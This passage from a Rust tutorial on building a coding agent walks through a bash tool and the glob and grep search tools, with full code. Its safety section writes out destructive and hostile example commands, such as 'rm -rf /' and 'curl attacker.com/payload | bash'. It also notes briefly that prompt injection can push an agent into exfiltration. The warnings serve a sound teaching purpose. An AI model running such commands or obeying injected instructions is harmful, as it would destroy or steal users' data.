One required parameter: command -- the shell command to execute. The description "Run a bash command and return its output" is deliberately simple. The LLM already knows what bash is. Over-describing the tool wastes prompt tokens and can confuse the model into overthinking when to use it.

As an extension, you could add an optional timeout parameter so the LLM can bound long-running commands, with a sensible default when it is omitted. The reference implementation includes this.

Argument extraction

#![allow(unused)]
fn main() {
let command = args["command"]
    .as_str()
    .context("missing 'command' argument")?;
}

The command extraction uses .context(...) with ? to return an Err if the argument is missing. A bash call without a command is a protocol violation, not a tool failure. The LLM should never produce this, and if it does, the agent's error handling will catch it.

Running the command

#![allow(unused)]
fn main() {
let output = tokio::process::Command::new("bash")
    .arg("-c")
    .arg(command)
    .output()
    .await?;
}

Rust concept: tokio::process::Command vs std::process::Command

tokio::process::Command is the async counterpart of std::process::Command. The key difference: std's version blocks the current OS thread while waiting for the subprocess to finish. In an async runtime like Tokio, blocking a thread means the runtime cannot make progress on other tasks (other tool calls, streaming events, UI updates). tokio's version yields to the runtime while waiting, so the thread can do useful work. Always use tokio::process inside async fn -- using std::process in an async context is a common mistake that leads to performance problems or deadlocks under load.

Two layers here, each doing one thing:

  1. tokio::process::Command spawns an async subprocess. We use bash -c so the command string is interpreted by bash, not executed as a raw binary. This means pipes, redirects, semicolons, and all other shell features work: echo hello | wc -c, ls > out.txt, cd /tmp && pwd.

  2. .output() collects the process's stdout, stderr, and exit status. This buffers everything in memory. For a production agent you would want streaming (pipe stdout/stderr to the TUI in real time), but buffered collection is simpler and sufficient for our purposes.

If the process fails to spawn (bash not found, OS refuses to create the process), the ? operator propagates the error up. The agent loop catches it and reports it to the LLM.
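You can verify the bash -c behavior from any terminal; the exact formatting varies by platform, but the semantics are what the tool relies on:

```shell
# Pipes work because bash interprets the string:
bash -c 'echo hello | wc -c'   # counts 6 bytes, including the trailing newline

# Shell state like the working directory is scoped to the one invocation:
bash -c 'cd /tmp && pwd'       # prints the resolved /tmp path

# Without -c there is no shell: no binary is literally named "echo hello | wc -c".
```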

Adding a timeout (extension)

Without a timeout, a single bad command can hang the agent forever. The LLM might run sleep infinity, start a server that listens on a port, or trigger an interactive program that waits for stdin. Any of these blocks the agent loop indefinitely -- no more tool calls, no more responses, just a frozen process burning compute.

As an extension, you can wrap the command in tokio::time::timeout:

#![allow(unused)]
fn main() {
let output = tokio::time::timeout(
    std::time::Duration::from_secs(120),
    tokio::process::Command::new("bash")
        .arg("-c")
        .arg(command)
        .output(),
)
.await;
}

This produces a nested Result: Ok(Ok(output)) for success, Ok(Err(e)) for spawn failures, and Err(_) for timeouts. The reference implementation includes this pattern.
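The nested shape is easy to mishandle, so it helps to flatten it explicitly. A std-only sketch that simulates the three cases with String errors (names are illustrative; the real code matches on the value of tokio::time::timeout):

```rust
/// Simulated shape of tokio::time::timeout(dur, command.output()).await:
/// the outer Result is the timeout, the inner one is the spawn/IO result.
type Timed = Result<Result<String, String>, ()>;

fn flatten(timed: Timed) -> Result<String, String> {
    match timed {
        Ok(Ok(output)) => Ok(output),                    // command finished in time
        Ok(Err(e)) => Err(format!("spawn failed: {e}")), // e.g. bash not found
        Err(()) => Err("command timed out".to_string()), // deadline elapsed first
    }
}

fn main() {
    assert_eq!(flatten(Ok(Ok("hi".into()))), Ok("hi".to_string()));
    assert_eq!(flatten(Err(())), Err("command timed out".to_string()));
}
```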

Output format

The output construction logic handles three concerns: stdout, stderr, and the empty case.

#![allow(unused)]
fn main() {
let stdout = String::from_utf8_lossy(&output.stdout);
let stderr = String::from_utf8_lossy(&output.stderr);

let mut result = String::new();
if !stdout.is_empty() {
    result.push_str(&stdout);
}
if !stderr.is_empty() {
    if !result.is_empty() {
        result.push('\n');
    }
    result.push_str("stderr: ");
    result.push_str(&stderr);
}

if result.is_empty() {
    result.push_str("(no output)");
}
}

Walk through each decision:

Rust concept: String::from_utf8_lossy vs String::from_utf8

String::from_utf8_lossy returns a Cow<str> -- it borrows the original bytes if they are valid UTF-8 (zero-cost), or allocates a new String with replacement characters if they are not. The alternative, String::from_utf8(), returns Err on invalid UTF-8, which would require error handling for a case we want to tolerate. from_utf8_lossy is the right choice whenever you need a string but cannot guarantee the input encoding.

String::from_utf8_lossy converts the raw bytes to a string, replacing invalid UTF-8 sequences with the replacement character. Command output is not guaranteed to be valid UTF-8 -- binary data, locale-dependent encodings, or corrupted streams can all produce invalid bytes. Lossy conversion is the right default because the LLM needs a string, and a few replacement characters are better than a crash.
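A quick demonstration of the lossy behavior:

```rust
fn main() {
    // Valid UTF-8 passes through unchanged (borrowed as Cow::Borrowed, no allocation).
    let ok = String::from_utf8_lossy(b"hello");
    assert_eq!(ok, "hello");

    // 0xFF is never valid in UTF-8; it becomes U+FFFD, the replacement character.
    let bad = String::from_utf8_lossy(&[0x68, 0x69, 0xFF]);
    assert_eq!(bad, "hi\u{FFFD}");

    // The strict variant refuses the same input outright.
    assert!(String::from_utf8(vec![0xFF]).is_err());
}
```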

Stdout comes first, undecorated. This is the primary output. When ls lists files or cat prints content, that output appears verbatim. No prefix, no wrapping.

Stderr is prefixed with "stderr: ". This lets the LLM distinguish normal output from error output. Many commands write diagnostics to stderr even on success (compiler warnings, progress indicators, deprecation notices). The prefix prevents the model from misinterpreting warnings as failures. The newline before the prefix is only added if stdout was non-empty, keeping the output clean when stderr is the only content.

"(no output)" for silent commands. Commands like true, mkdir -p /tmp/foo, or cp a b produce no stdout and no stderr on success. Returning an empty string would confuse the LLM -- it might think the tool failed or the result was lost. The sentinel string confirms the command ran and had nothing to say.

As an extension, you could also report non-zero exit codes in the output string. The reference implementation appends "exit code: N" when the process exits with a non-zero status, helping the LLM diagnose failures.
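That formatting logic can be sketched as a pure function, including the hypothetical exit-code extension (the function name and signature are illustrative, not the starter's API):

```rust
/// Combine stdout, stderr, and exit status into the single string the LLM sees.
/// Mirrors the BashTool's formatting; the exit-code line is the extension.
fn format_output(stdout: &str, stderr: &str, exit_code: i32) -> String {
    let mut result = String::new();
    if !stdout.is_empty() {
        result.push_str(stdout);
    }
    if !stderr.is_empty() {
        if !result.is_empty() {
            result.push('\n');
        }
        result.push_str("stderr: ");
        result.push_str(stderr);
    }
    if result.is_empty() {
        result.push_str("(no output)");
    }
    if exit_code != 0 {
        result.push_str(&format!("\nexit code: {exit_code}"));
    }
    result
}

fn main() {
    assert_eq!(format_output("", "", 0), "(no output)");
    assert_eq!(format_output("ok\n", "warn\n", 0), "ok\n\nstderr: warn\n");
    assert_eq!(format_output("", "boom\n", 1), "stderr: boom\n\nexit code: 1");
}
```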

Safety considerations

The bash tool is the most dangerous tool in the agent's arsenal. It can run anything -- rm -rf /, dd if=/dev/zero of=/dev/sda, curl ... | bash. The starter's simplified Tool trait does not include safety flags like is_destructive(), but in a production agent (and in the reference implementation), the bash tool would be marked as destructive, requiring explicit user approval even in auto-approve mode.

The starter Tool trait has only definition() and call(). Adding safety metadata (read-only, destructive, concurrent-safe flags) is an extension topic covered in later chapters.

Safety warning

This tool passes LLM-generated commands directly to a bash shell. There is no sandboxing, no command filtering, no allowlist, no denylist. The LLM can run rm -rf / and your filesystem is gone. It can run curl attacker.com/payload | bash and your machine is compromised. It can read your SSH keys, your environment variables, your browser cookies.

This is not a hypothetical concern. LLMs can be manipulated through prompt injection -- malicious instructions hidden in file contents, README files, or web pages that the agent processes. A carefully crafted prompt injection could instruct the model to exfiltrate data or destroy files.

For the purposes of this tutorial, the bash tool is safe to use with trusted prompts in a controlled environment. Do not point it at untrusted input. Do not run it on a machine with sensitive data. Use a container, a VM, or at minimum a dedicated user account with limited permissions.

Chapters 13-16 build the safety infrastructure that makes the bash tool safe for production:

  • Chapter 13 (Permissions) adds the permission engine that gates every tool call, requiring user approval for destructive operations.
  • Chapter 14 (Safety) adds command classification that detects and blocks dangerous patterns like rm -rf, chmod 777, and curl | bash.
  • Chapter 15 (Hooks) adds pre-tool hooks that can inspect and reject commands before execution.
  • Chapter 16 (Plan Mode) adds a read-only mode where destructive tools are blocked entirely.

Until you build those chapters, treat the bash tool with the respect you would give sudo access to an unpredictable collaborator.

How Claude Code does it

Claude Code's bash tool shares the same core -- bash -c <command> with timeout -- but adds several layers of production hardening:

Command filtering. Before executing any command, Claude Code runs the command string through a safety classifier that checks for dangerous patterns. Commands like rm -rf /, chmod -R 777, curl ... | sh, and others are flagged or blocked outright. The classifier is not a simple regex -- it understands shell quoting and piping to avoid false positives.

Working directory management. Claude Code tracks and sets the working directory for each bash invocation. If one command cds into a directory, subsequent commands remember that directory. Our version always runs in the process's current directory.

Process group killing on timeout. When our tool times out, the spawned process may continue running in the background. Claude Code creates a process group for each command and kills the entire group on timeout, ensuring no orphan processes linger.

Streaming stdout/stderr. Rather than buffering all output and returning it at the end, Claude Code pipes stdout and stderr to the TUI in real time. The user sees compilation output, test results, and progress indicators as they happen. This is essential for long-running commands where waiting for the final result would leave the user staring at a blank screen.

Permission engine integration. Every bash command passes through the permission engine before execution. Depending on the configuration, the user may be prompted to approve the command, the command may be auto-approved if it matches a safe pattern, or it may be denied outright.

Our version is the core protocol without the safety wrapping -- the minimal viable implementation that demonstrates how an LLM interacts with a shell. The production features are layers on top, not changes to the fundamental design.

Tests

Run the bash tool tests:

cargo test -p mini-claw-code-starter test_bash_

Here is what the bash-specific tests verify:

test_bash_definition -- Checks that the tool name is "bash".

test_bash_runs_command -- Runs a simple command and checks that stdout is captured.

test_bash_captures_stderr -- Runs a command that writes to stderr and checks that the output contains the stderr content.

test_bash_stdout_and_stderr -- Runs a command that produces both stdout and stderr, and verifies both appear in the output.

test_bash_no_output -- Runs true (a command that succeeds silently) and checks that the output indicates no output was produced.

test_bash_multiline_output -- Runs a multi-command pipeline and checks that all output lines appear.

Recap

You have built the bash tool -- the most important and most dangerous tool in the agent's toolkit:

  • command is the one required parameter.
  • tokio::process::Command with bash -c gives the LLM full shell access -- pipes, redirects, variables, and everything else bash supports.
  • Output format combines stdout and labeled stderr into a single string. Silent commands return "(no output)" so the LLM knows the command ran.
  • No safety rails -- this chapter builds the raw capability. The permission engine, safety classifier, hooks, and plan mode come in later chapters.

As extensions, you could add a timeout parameter (to prevent hung commands), exit code reporting, and safety flags like is_destructive().

The bash tool completes the core tool set. Your agent can now read files, write files, edit files, and run arbitrary commands. With the SimpleAgent from the earlier chapters driving the loop, you have a functioning coding agent -- one that can understand a codebase, make changes, run tests, and iterate until the job is done.

Key takeaway

The bash tool is what makes a coding agent a programmer rather than a text editor. It is also the simplest tool to implement (a single Command::new("bash").arg("-c").arg(command) call) and the hardest to make safe. The implementation pattern -- capture output, label stderr, handle silence -- is reusable for any subprocess-based tool.

What's next

In Chapter 11: Search Tools you will build the tools that help the agent navigate large codebases -- glob for finding files by pattern and grep for searching file contents. These read-only tools are the agent's eyes, complementing the hands (bash, write, edit) you have already built.

Check yourself


← Chapter 9: File Tools · Contents · Chapter 11: Search Tools →

Chapter 11: Search Tools

File(s) to edit: (extension -- no stubs in starter) Tests: No tests in the starter. GlobTool and GrepTool are extension tools. Estimated time: 25 min (read-only)

Goal

  • Understand why file discovery (GlobTool) and content search (GrepTool) are separate tools with distinct parameter schemas.
  • Implement GlobTool so the agent can find files by name pattern using the glob crate.
  • Implement GrepTool with recursive directory walking, regex matching, and an optional file type filter.
  • Learn when to use async vs sync helper functions in tool implementations (I/O-bound file reads vs fast directory walking).

A coding agent that can only read files it already knows about is like a developer who never uses find or grep. You can hand it a specific file path and it will read it faithfully, but drop it into an unfamiliar codebase and it is blind. It cannot discover which files exist, cannot search for where a function is defined, cannot find all the places a type is used. Without search, the LLM has to guess file paths -- and it will guess wrong.

Search tools fix this. In this chapter we explore two: GlobTool finds files by name pattern, and GrepTool searches file contents by regex. Together they give the LLM the ability to navigate any codebase, no matter how large or unfamiliar. These are the eyes of the agent.

How the search tools fit into the agent workflow

flowchart TD
    LLM[LLM decides what to do]
    LLM -->|"What files exist?"| Glob[GlobTool]
    LLM -->|"Where is this defined?"| Grep[GrepTool]
    Glob -->|returns file paths| LLM
    Grep -->|"returns path:line: content"| LLM
    LLM -->|reads specific file| Read[ReadTool]
    LLM -->|modifies file| Edit[EditTool]
    Read -->|file contents| LLM
    Edit -->|confirmation| LLM

Note: Search tools are extensions in this book -- neither the starter (mini-claw-code-starter) nor the reference implementation (mini-claw-code) ships a GlobTool or GrepTool. If you want to add them, you will create src/tools/glob.rs and src/tools/grep.rs from scratch and register them in src/tools/mod.rs. The complete reference code for both tools is reproduced inline below -- treat this chapter as an annotated implementation walkthrough rather than a stub-filling exercise.

Two tools, two questions

The split between glob and grep maps to two distinct questions the LLM asks when exploring code:

  1. "What files exist?" -- GlobTool. The LLM knows it wants Rust files, or test files, or config files. It does not know their exact paths. A glob pattern like **/*.rs or tests/*.toml answers this.

  2. "Where is this thing defined?" -- GrepTool. The LLM knows a function name, a type, an error message. It needs to find which file and which line contain it. A regex pattern like fn parse_sse_line or struct QueryConfig answers this.

Claude Code has both as separate tools for exactly this reason. They serve different purposes, take different inputs, and the LLM chooses between them based on what it knows. Merging them into one tool would muddy the interface -- the LLM would have to figure out whether it is doing a name search or a content search, and the parameter schema would be awkward.


GlobTool

GlobTool is the simpler of the two. It takes a glob pattern, optionally scoped to a base directory, and returns all matching file paths.

File layout

The implementation lives at src/tools/glob.rs. Here is the complete code:

#![allow(unused)]
fn main() {
use async_trait::async_trait;
use serde_json::Value;

use crate::types::*;

pub struct GlobTool {
    definition: ToolDefinition,
}

impl GlobTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("glob", "Find files matching a glob pattern")
                .param("pattern", "string", "Glob pattern (e.g. \"**/*.rs\")", true)
                .param(
                    "path",
                    "string",
                    "Base directory to search in (default: current directory)",
                    false,
                ),
        }
    }
}

impl Default for GlobTool {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl Tool for GlobTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let pattern = args["pattern"]
            .as_str()
            .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?;

        let base = args
            .get("path")
            .and_then(|v| v.as_str())
            .unwrap_or(".");

        let full_pattern = if pattern.starts_with('/') || pattern.starts_with('.') {
            pattern.to_string()
        } else {
            format!("{base}/{pattern}")
        };

        let entries: Vec<String> = glob::glob(&full_pattern)
            .map_err(|e| anyhow::anyhow!("invalid glob pattern: {e}"))?
            .filter_map(|entry| entry.ok())
            .map(|p| p.display().to_string())
            .collect();

        if entries.is_empty() {
            Ok("no files matched".to_string())
        } else {
            Ok(entries.join("\n"))
        }
    }
}
}

Walking through the implementation

The definition. Two parameters: pattern (required) and path (optional). The pattern is a standard glob -- *.rs for Rust files in the current directory, **/*.rs for Rust files recursively, src/**/*.toml for TOML files under src/. The path sets the base directory; it defaults to "." (the current working directory) when omitted.

Pattern construction. The call method builds the full glob pattern from the base directory and the user-supplied pattern. If the pattern already starts with / or ., it is treated as an absolute or relative path and used directly. Otherwise, the base directory is prepended: format!("{base}/{pattern}"). This means calling with {"pattern": "*.rs", "path": "/home/user/project"} produces the glob /home/user/project/*.rs.
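The prefix logic is small enough to test in isolation (a hypothetical helper extracted from call):

```rust
/// Build the full glob pattern from a base directory and a user pattern.
/// Absolute (/) and explicitly relative (.) patterns bypass the base.
fn full_pattern(base: &str, pattern: &str) -> String {
    if pattern.starts_with('/') || pattern.starts_with('.') {
        pattern.to_string()
    } else {
        format!("{base}/{pattern}")
    }
}

fn main() {
    assert_eq!(full_pattern("/home/user/project", "*.rs"), "/home/user/project/*.rs");
    assert_eq!(full_pattern(".", "**/*.rs"), "./**/*.rs"); // "." default base
    assert_eq!(full_pattern("src", "/etc/*.conf"), "/etc/*.conf"); // absolute wins
}
```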

The glob crate. We use the glob crate (already in Cargo.toml) to do the actual matching. glob::glob() returns an iterator of Result<PathBuf> entries. We filter_map with entry.ok() to silently skip any paths that fail (permission errors, broken symlinks). The remaining paths are converted to display strings and collected.

Output format. Matching paths are joined with newlines -- one path per line. If nothing matches, we return "no files matched" rather than an empty string. This matters for the LLM: an explicit "no files matched" message tells it the pattern was valid but found nothing, prompting it to try a different pattern. An empty string would be ambiguous.


GrepTool

GrepTool is more complex. It searches file contents using regex, optionally scoped to a directory and filtered by file type. The output follows the classic grep format: path:line_no: content.

The complete implementation

Here is src/tools/grep.rs:

#![allow(unused)]
fn main() {
use std::path::Path;

use async_trait::async_trait;
use serde_json::Value;

use crate::types::*;

pub struct GrepTool {
    definition: ToolDefinition,
}

impl GrepTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("grep", "Search file contents using a regex pattern")
                .param("pattern", "string", "Regex pattern to search for", true)
                .param(
                    "path",
                    "string",
                    "File or directory to search in (default: current directory)",
                    false,
                )
                .param(
                    "include",
                    "string",
                    "Glob pattern to filter files (e.g. \"*.rs\")",
                    false,
                ),
        }
    }
}

impl Default for GrepTool {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl Tool for GrepTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let pattern = args["pattern"]
            .as_str()
            .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?;

        let re = regex::Regex::new(pattern)
            .map_err(|e| anyhow::anyhow!("invalid regex pattern: {e}"))?;

        let search_path = args
            .get("path")
            .and_then(|v| v.as_str())
            .unwrap_or(".");

        let include_pattern = args.get("include").and_then(|v| v.as_str());
        let include_glob = include_pattern
            .map(|p| glob::Pattern::new(p))
            .transpose()
            .map_err(|e| anyhow::anyhow!("invalid include pattern: {e}"))?;

        let path = Path::new(search_path);
        let mut matches = Vec::new();

        if path.is_file() {
            search_file(&re, path, &mut matches).await;
        } else if path.is_dir() {
            let mut entries = Vec::new();
            collect_files(path, &include_glob, &mut entries);
            entries.sort();
            for file_path in entries {
                search_file(&re, &file_path, &mut matches).await;
            }
        } else {
            anyhow::bail!("path does not exist: {search_path}");
        }

        if matches.is_empty() {
            Ok("no matches found".to_string())
        } else {
            Ok(matches.join("\n"))
        }
    }
}

/// Search a single file for regex matches and append formatted results.
async fn search_file(re: &regex::Regex, path: &Path, matches: &mut Vec<String>) {
    let Ok(content) = tokio::fs::read_to_string(path).await else {
        return; // Skip binary/unreadable files
    };
    let display = path.display();
    for (line_no, line) in content.lines().enumerate() {
        if re.is_match(line) {
            matches.push(format!("{display}:{}: {line}", line_no + 1));
        }
    }
}

/// Recursively collect files from a directory, optionally filtering by glob.
fn collect_files(
    dir: &Path,
    include: &Option<glob::Pattern>,
    out: &mut Vec<std::path::PathBuf>,
) {
    let Ok(entries) = std::fs::read_dir(dir) else {
        return;
    };
    for entry in entries.flatten() {
        let path = entry.path();
        if path.is_dir() {
            // Skip hidden directories
            if path
                .file_name()
                .is_some_and(|n| n.to_string_lossy().starts_with('.'))
            {
                continue;
            }
            collect_files(&path, include, out);
        } else if path.is_file() {
            if let Some(glob) = include {
                let name = path
                    .file_name()
                    .map(|n| n.to_string_lossy().to_string())
                    .unwrap_or_default();
                if !glob.matches(&name) {
                    continue;
                }
            }
            out.push(path);
        }
    }
}
}

Walking through the implementation

There is more going on here, so let's take it piece by piece.

The definition. Three parameters: pattern (required regex), path (optional file or directory), and include (optional glob filter for file names). The LLM might call it as {"pattern": "fn main"} to search the current directory, or {"pattern": "TODO", "path": "src/", "include": "*.rs"} to search only Rust files under src/.

Regex compilation. The pattern is compiled into a regex::Regex upfront. If the LLM provides an invalid regex (missing closing bracket, bad escape), we return an error immediately rather than crashing partway through the search. The regex crate handles the full Rust regex syntax -- character classes, quantifiers, alternation, captures.

The include filter. The include parameter is a glob pattern, not a regex. We compile it into a glob::Pattern using the same glob crate that powers GlobTool.

Rust concept: Option::transpose

The .transpose() call converts Option<Result<T>> into Result<Option<T>>. This is a common Rust idiom when you have an optional operation that might fail. Without transpose, you would need a match or if let to handle the Some(Ok(...)), Some(Err(...)), and None cases separately. With it, you can use ? to propagate the error and end up with a clean Option<T>. The pattern x.map(fallible_fn).transpose()? reads as: "if present, try the operation; if it fails, propagate the error; if absent, produce None."
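A minimal std-only illustration of the idiom (`parse_opt` is a made-up helper, not part of the codebase):

```rust
// Option<Result<i32, _>> becomes Result<Option<i32>, _> via transpose,
// so a single `?` can propagate the error at the call site.
fn parse_opt(s: Option<&str>) -> Result<Option<i32>, std::num::ParseIntError> {
    s.map(|v| v.parse::<i32>()).transpose()
}

fn main() {
    assert_eq!(parse_opt(Some("42")), Ok(Some(42)));
    assert_eq!(parse_opt(None), Ok(None));
    assert!(parse_opt(Some("not a number")).is_err());
}
```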

Three-way path dispatch. The search path can be a file, a directory, or nonexistent:

  • File: Search just that one file. The LLM does this when it already knows which file to look in.
  • Directory: Recursively collect all files (filtered by include if provided), sort them for deterministic output, then search each one.
  • Nonexistent: Return an error via bail!. The agent loop catches this and reports it to the LLM as "error: path does not exist: /nonexistent/path", and the model can recover by trying a different path.

Output format. Each match is formatted as path:line_no: content, following the classic grep convention. Line numbers are 1-based (humans and LLMs both expect line 1 to be the first line, not line 0). When no matches are found, the tool returns "no matches found" -- again, explicit is better than empty.
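The format can be sketched in isolation. This simplified version uses substring matching in place of the regex crate so it stays std-only; the shape of the output is the same:

```rust
// Sketch of the classic grep output format: path:line_no: content, 1-based.
fn grep_lines(path: &str, needle: &str, content: &str) -> Vec<String> {
    let mut matches = Vec::new();
    for (line_no, line) in content.lines().enumerate() {
        if line.contains(needle) {
            // enumerate() is 0-based, so add 1 for human-style line numbers.
            matches.push(format!("{path}:{}: {line}", line_no + 1));
        }
    }
    matches
}

fn main() {
    let content = "fn main() {\nprintln!(\"hello\");\n}";
    assert_eq!(
        grep_lines("demo.rs", "println", content),
        vec!["demo.rs:2: println!(\"hello\");"]
    );
}
```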


Helper function design

Rust concept: choosing async vs sync for helpers

The two helper functions -- search_file and collect_files -- are deliberately designed with different signatures. Understanding why reveals practical Rust async patterns. The decision rule is simple: if the function does I/O that could block (reading file contents), make it async. If it does fast metadata operations (listing directory entries), keep it sync. Making everything async "just in case" adds complexity -- recursive async functions require Pin<Box<dyn Future>> or the async_recursion crate -- and provides no benefit when the operation is already fast.

search_file is async

#![allow(unused)]
fn main() {
async fn search_file(re: &regex::Regex, path: &Path, matches: &mut Vec<String>) {
    let Ok(content) = tokio::fs::read_to_string(path).await else {
        return; // Skip binary/unreadable files
    };
    let display = path.display();
    for (line_no, line) in content.lines().enumerate() {
        if re.is_match(line) {
            matches.push(format!("{display}:{}: {line}", line_no + 1));
        }
    }
}
}

This function reads a file from disk, which is I/O. Using tokio::fs::read_to_string instead of std::fs::read_to_string keeps the async runtime free to do other work while waiting on the filesystem. In a real agent with concurrent tool execution, this matters -- a slow NFS mount or large file should not block the entire runtime.

The let Ok(content) = ... else { return; } pattern is a quiet bailout. If the file cannot be read -- it is binary, it is a symlink to a deleted file, the user lacks permissions -- we silently skip it. This is the right behavior for a search tool. The LLM asked "where does this pattern appear?" and the answer should only include files where we could actually check. Reporting an error for every unreadable file in a directory tree would drown the useful results in noise.
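The same let-else bailout works with the synchronous API. A std-only sketch (`first_line` is an illustrative helper, not part of the codebase):

```rust
use std::fs;
use std::path::Path;

// The let-else "quiet bailout": unreadable paths are skipped, not reported.
fn first_line(path: &Path) -> Option<String> {
    let Ok(content) = fs::read_to_string(path) else {
        return None; // missing, binary (invalid UTF-8), or permission-denied: skip silently
    };
    content.lines().next().map(|l| l.to_string())
}

fn main() {
    assert_eq!(first_line(Path::new("/definitely/not/a/real/file")), None);
}
```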

collect_files is sync

#![allow(unused)]
fn main() {
fn collect_files(
    dir: &Path,
    include: &Option<glob::Pattern>,
    out: &mut Vec<std::path::PathBuf>,
) {
    let Ok(entries) = std::fs::read_dir(dir) else {
        return;
    };
    for entry in entries.flatten() {
        let path = entry.path();
        if path.is_dir() {
            if path
                .file_name()
                .is_some_and(|n| n.to_string_lossy().starts_with('.'))
            {
                continue;
            }
            collect_files(&path, include, out);
        } else if path.is_file() {
            if let Some(glob) = include {
                let name = path
                    .file_name()
                    .map(|n| n.to_string_lossy().to_string())
                    .unwrap_or_default();
                if !glob.matches(&name) {
                    continue;
                }
            }
            out.push(path);
        }
    }
}
}

Directory walking is fast -- it reads metadata, not file contents. Making it async would add complexity (recursive async functions require boxing) without meaningful performance benefit. The sync std::fs::read_dir is fine here.

Three details worth noting:

Hidden directory skipping. Directories whose names start with . are skipped entirely. This excludes .git, .cargo, .vscode, node_modules hidden behind a dot-prefix, and similar directories that are almost never what the LLM wants to search. Without this filter, a grep through a project directory would spend most of its time scanning .git/objects -- thousands of binary blob files that produce no useful matches.
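The dot-prefix check is a one-liner worth seeing on its own:

```rust
use std::path::Path;

// Sketch of the hidden-directory check: does the final path component start with '.'?
fn is_hidden(path: &Path) -> bool {
    path.file_name()
        .is_some_and(|n| n.to_string_lossy().starts_with('.'))
}

fn main() {
    assert!(is_hidden(Path::new("project/.git")));
    assert!(is_hidden(Path::new(".cargo")));
    assert!(!is_hidden(Path::new("project/src")));
}
```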

The include filter. When present, the glob pattern is matched against the file name only (not the full path). This means "*.rs" matches src/main.rs by checking just main.rs against the pattern. This is intuitive -- when the LLM says "search only Rust files," it means files ending in .rs, regardless of where they live in the tree.

The sort. After collecting all files, the caller sorts them before searching. This ensures deterministic output order. Without sorting, read_dir returns entries in filesystem order, which varies across operating systems and even across runs on the same system. Deterministic output makes tests reliable and makes the LLM's experience consistent.


Why two separate tools

You might wonder: why not one SearchTool with a mode parameter? The answer comes down to how LLMs make decisions.

When the LLM sees two separate tools in its schema -- one called glob described as "find files matching a pattern" and one called grep described as "search file contents using regex" -- it can instantly match its intent to the right tool. "I need to find all test files" maps to glob. "I need to find where parse_sse_line is defined" maps to grep.

A combined tool with a mode: "files" | "content" parameter adds a decision layer. The LLM has to read the schema more carefully, understand the mode field, and get it right. With smaller models, this extra indirection leads to mistakes -- calling the tool in the wrong mode, or omitting the mode parameter entirely.

Claude Code keeps them separate. So do we.

There is also a practical reason: the parameter sets are different. Glob takes a glob pattern and a base path. Grep takes a regex pattern, a path, and an include filter. Merging them would mean the LLM always sees parameters that are irrelevant to what it is doing, which wastes context tokens and increases the chance of confusion.


How Claude Code does it

Our implementations are the essential protocol -- they capture the core behavior in under 200 lines. Claude Code's production versions are considerably more sophisticated.

Claude Code's Glob uses ripgrep internally for speed. On large codebases with hundreds of thousands of files, the glob crate's pure-Rust implementation can be slow. Ripgrep's directory walker is optimized for this use case, respecting .gitignore rules and parallelizing the walk. Claude Code's Glob also supports sorting results by modification time (most recently changed files first, which is often what the LLM wants) and limits the number of results to avoid flooding the context window.

Claude Code's Grep is equally enhanced. It supports context lines (-A, -B, -C flags) to show surrounding code, which helps the LLM understand matches without making a separate read call. It offers multiple output modes: show matching lines (default), show only file paths (for counting), or show match counts per file. File type filtering uses ripgrep's built-in type system rather than a glob pattern, so --type rust knows about .rs files, Cargo.toml, and build.rs without the user spelling out the glob.

Our versions skip all of this. We use the glob crate instead of ripgrep, we have no context lines, no output modes, no result limits. What we do have is the correct protocol: the LLM sends a pattern and gets back matching results in a format it can parse. Everything else is optimization. If you want to upgrade later, the Tool trait interface stays the same -- only the internals of call() change.


Tests

Since GlobTool and GrepTool are extensions, neither the starter nor the reference implementation ships tests for them. The assertions below describe the test cases you would add alongside the tool code if you build these out yourself -- they are the contract the tools should satisfy. Once you have copied the tool code into mini-claw-code-starter/src/tools/ and written these tests, you can run them with:

cargo test -p mini-claw-code-starter grep

Recommended test cases:

GlobTool tests

test_grep_glob_find_files -- Creates a temp directory with a.rs, b.rs, and c.txt. Globs for *.rs. Verifies that both .rs files appear in the result and the .txt file does not.

test_grep_glob_recursive -- Creates a temp directory with top.rs at the root and sub/deep.rs in a subdirectory. Globs for **/*.rs. Verifies that both files are found, confirming recursive descent works.

test_grep_glob_no_matches -- Creates a temp directory with file.txt and globs for *.xyz. Verifies the result contains "no files matched".

test_grep_glob_definition -- Verifies the tool definition has the name "glob".

GrepTool tests

test_grep_grep_single_file -- Creates a file containing fn main() and println!("hello"). Greps for "println". Verifies the match includes the content and the correct line number (:2:).

test_grep_grep_directory -- Creates two files, both containing fn foo(). Greps the directory for "fn foo". Verifies both files appear in the results.

test_grep_grep_with_include -- Creates code.rs and data.txt, both containing "hello world". Greps with include: "*.rs". Verifies only the .rs file appears in results.

test_grep_grep_no_matches -- Creates a file and greps for a pattern that does not appear. Verifies the result contains "no matches found".

test_grep_grep_regex -- Creates a file with foo123, bar456, baz789. Greps with the regex \d{3} (three digits). Verifies all three lines match, confirming real regex support rather than plain string matching.

test_grep_grep_nonexistent_path -- Greps a path that does not exist. Verifies the result is an error.

test_grep_grep_definition -- Verifies the tool definition has the name "grep".


Recap

This chapter added two search tools that let the agent discover and navigate code:

  • GlobTool finds files by name pattern. It takes a glob like **/*.rs and returns matching paths, one per line. It uses the glob crate for pattern matching and defaults to the current directory when no base path is provided.

  • GrepTool searches file contents by regex. It takes a pattern like fn main and returns matches in path:line_no: content format. It supports scoping to a file or directory and filtering by file type with the include parameter. Two helper functions split the work: search_file (async, handles I/O) and collect_files (sync, walks the directory tree).

  • Both tools are read-only. They never modify the filesystem. In a production agent with safety flags, they would be marked as read-only and concurrent-safe.

  • The separation is deliberate. Glob answers "what files exist?" Grep answers "where is this content?" Two tools with clear purposes are easier for the LLM to use correctly than one tool with a mode switch.

  • These are extensions. The starter does not include stubs for GlobTool or GrepTool. If you want to add them, create the files from scratch following the patterns shown above and register them in src/tools/mod.rs.

Key takeaway

Search tools are what turn a coding agent from a tool that edits known files into one that can explore and understand an unfamiliar codebase. The two-tool split (glob for names, grep for contents) maps directly to the two questions a developer asks when navigating code: "what files exist?" and "where is this thing?" Keeping them separate gives the LLM a clear, unambiguous interface for each question.

